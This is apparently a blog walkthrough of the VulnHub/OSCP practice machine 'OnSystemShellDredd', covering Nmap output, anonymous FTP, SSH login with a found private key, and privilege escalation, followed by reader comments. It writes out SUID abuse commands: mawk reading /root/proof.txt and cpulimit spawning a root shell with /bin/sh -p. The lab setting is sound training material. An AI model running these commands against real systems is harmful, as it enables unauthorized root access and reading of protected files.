MACHINE : OnSystemShellDredd
LEVEL: EASY
FROM: OSCP-PORTAL/VULNHUB
Nmap
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.60
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix
port 21 FTP only opened
PORT 21
anonymous login allowed
found port 6100, ssh service running
we have id_rsa and approx username Hannah and ssh port so I try to login ssh
yep, we logged in successfully :)
got local.txt
Privilege Escalation
wow, this machine doesn't have sudo binary interesting!!!
I transfer linpeash to the victim machine for further enumeration
SUID Abuse ?
Said permission is Called SUID
which stands for Set Owner User ID
in this case, mawk and cpulimit suid set to (root) so we can easily abuse then became the root
GTOFBINS
gtofbins is an amazing website to bypass(abuse-suid's) Unix binaries and local file misconfigurations
for more https://gtfobins.github.io/
mawk suid abuse
LFILE=/root/proof.txt
mawk '//' "$LFILE"
Another way
cpulimit suid abuse
cpulimit -l 100 -f -- /bin/sh -p
that's it :)
Super bro ��
ReplyDeleteVanakkam nanba
DeleteSuper bro.. Clear explanation ����
ReplyDeleteThanks bro...❤️
DeletePost a Comment